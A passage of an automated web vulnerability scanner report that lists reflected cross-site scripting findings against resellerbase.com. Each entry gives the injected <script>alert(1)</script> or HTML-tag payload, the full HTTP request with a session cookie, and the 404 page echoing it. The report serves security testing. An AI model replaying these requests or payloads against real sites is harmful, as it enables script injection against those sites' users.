<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail8c968<script>alert(1)</script>5c26522f008672cf0/32/rating.php?id=32&rating=5 was not found on this server.</p>
...[SNIP]...

2.2263. http://www.resellerbase.com/detail/32/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/32/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 62a11<script>alert(1)</script>4984e36ac47 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail62a11<script>alert(1)</script>4984e36ac47/32/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail62a11<script>alert(1)</script>4984e36ac47/32/rating.php was not found on this server.</p>
...[SNIP]...

2.2264. http://www.resellerbase.com/detail/32/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/32/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4bddc<script>alert(1)</script>77c44087ddd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/324bddc<script>alert(1)</script>77c44087ddd/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/324bddc<script>alert(1)</script>77c44087ddd/rating.php was not found on this server.</p>
...[SNIP]...

2.2265. http://www.resellerbase.com/detail/32/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/32/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 950b0<script>alert(1)</script>53dd827dd775d2d47 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/32950b0<script>alert(1)</script>53dd827dd775d2d47/rating.php?id=32&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/32/6-chats-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/32950b0<script>alert(1)</script>53dd827dd775d2d47/rating.php?id=32&rating=5 was not found on this server.</p>
...[SNIP]...

2.2266. http://www.resellerbase.com/detail/32/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/32/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e604a<script>alert(1)</script>b613f5fb582f4a3a2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/32/rating.phpe604a<script>alert(1)</script>b613f5fb582f4a3a2?id=32&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/32/6-chats-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/32/rating.phpe604a<script>alert(1)</script>b613f5fb582f4a3a2?id=32&rating=5 was not found on this server.</p>
...[SNIP]...

2.2267. http://www.resellerbase.com/detail/32/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/32/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c181e<script>alert(1)</script>c78235f0541 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/32/rating.phpc181e<script>alert(1)</script>c78235f0541 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/32/rating.phpc181e<script>alert(1)</script>c78235f0541 was not found on this server.</p>
...[SNIP]...

2.2268. http://www.resellerbase.com/detail/32/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/32/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2d27d<script>alert(1)</script>d87269ff71c366394 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/32/rating.php/2d27d<script>alert(1)</script>d87269ff71c366394?id=32&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/32/6-chats-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/32/rating.php/2d27d<script>alert(1)</script>d87269ff71c366394?id=32&rating=5 was not found on this server.</p>
...[SNIP]...

2.2269. http://www.resellerbase.com/detail/32/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/32/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b474d<script>alert(1)</script>6d847da1e36 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/32/rating.php?b474d<script>alert(1)</script>6d847da1e36=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/32/rating.php?b474d<script>alert(1)</script>6d847da1e36=1 was not found on this server.</p>
...[SNIP]...

2.2270. http://www.resellerbase.com/detail/32/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/32/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 80d5a<script>alert(1)</script>101a2bb6ce5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail80d5a<script>alert(1)</script>101a2bb6ce5/32/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/32/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail80d5a<script>alert(1)</script>101a2bb6ce5/32/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2271. http://www.resellerbase.com/detail/32/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/32/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2b907<script>alert(1)</script>2c0031509e1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/322b907<script>alert(1)</script>2c0031509e1/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/32/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/322b907<script>alert(1)</script>2c0031509e1/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2272. http://www.resellerbase.com/detail/32/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/32/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload fc3b4<script>alert(1)</script>7ca800e0545 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/32/search.phpfc3b4<script>alert(1)</script>7ca800e0545?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/32/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/32/search.phpfc3b4<script>alert(1)</script>7ca800e0545?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2273. http://www.resellerbase.com/detail/32/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/32/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 9e386<a>1988cf2ea40 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/32/search.php?keyword=search...&Submit3=Search9e386<a>1988cf2ea40&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/32/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/32/search.php?keyword=search...&Submit3=Search9e386<a>1988cf2ea40&opt=2 was not found on this server.</p>
...[SNIP]...

2.2274. http://www.resellerbase.com/detail/32/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/32/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 7663a<a>7c4c6b31675 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/32/search.php?keyword=search...7663a<a>7c4c6b31675&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/32/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/32/search.php?keyword=search...7663a<a>7c4c6b31675&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2275. http://www.resellerbase.com/detail/32/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/32/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a5c92<script>alert(1)</script>8ba0e66b454 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/32/search.php?keyword=search...&Submit3=Search&opt=2&a5c92<script>alert(1)</script>8ba0e66b454=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/32/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/32/search.php?keyword=search...&Submit3=Search&opt=2&a5c92<script>alert(1)</script>8ba0e66b454=1 was not found on this server.</p>
...[SNIP]...

2.2276. http://www.resellerbase.com/detail/32/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/32/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 7c9a6<a>e9d178a148 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/32/search.php?keyword=search...&Submit3=Search&opt=27c9a6<a>e9d178a148 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/32/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/32/search.php?keyword=search...&Submit3=Search&opt=27c9a6<a>e9d178a148 was not found on this server.</p>
...[SNIP]...

2.2277. http://www.resellerbase.com/detail/32/themes/kosmos/images/rating/0.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/32/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e5656<script>alert(1)</script>1fff67bc861 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaile5656<script>alert(1)</script>1fff67bc861/32/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaile5656<script>alert(1)</script>1fff67bc861/32/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2278. http://www.resellerbase.com/detail/32/themes/kosmos/images/rating/0.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/32/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 13154<script>alert(1)</script>f61833a17de was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/3213154<script>alert(1)</script>f61833a17de/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/3213154<script>alert(1)</script>f61833a17de/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2279. http://www.resellerbase.com/detail/32/themes/kosmos/images/rating/0.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/32/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 58319<script>alert(1)</script>a4b2b80dce2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/32/themes58319<script>alert(1)</script>a4b2b80dce2/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/32/themes58319<script>alert(1)</script>a4b2b80dce2/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2280. http://www.resellerbase.com/detail/32/themes/kosmos/images/rating/0.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/32/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1f1c6<script>alert(1)</script>d6edb5b3c84 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/32/themes/kosmos1f1c6<script>alert(1)</script>d6edb5b3c84/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/32/themes/kosmos1f1c6<script>alert(1)</script>d6edb5b3c84/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2281. http://www.resellerbase.com/detail/32/themes/kosmos/images/rating/0.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/32/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b22cc<script>alert(1)</script>f7b6f13b216 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/32/themes/kosmos/imagesb22cc<script>alert(1)</script>f7b6f13b216/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
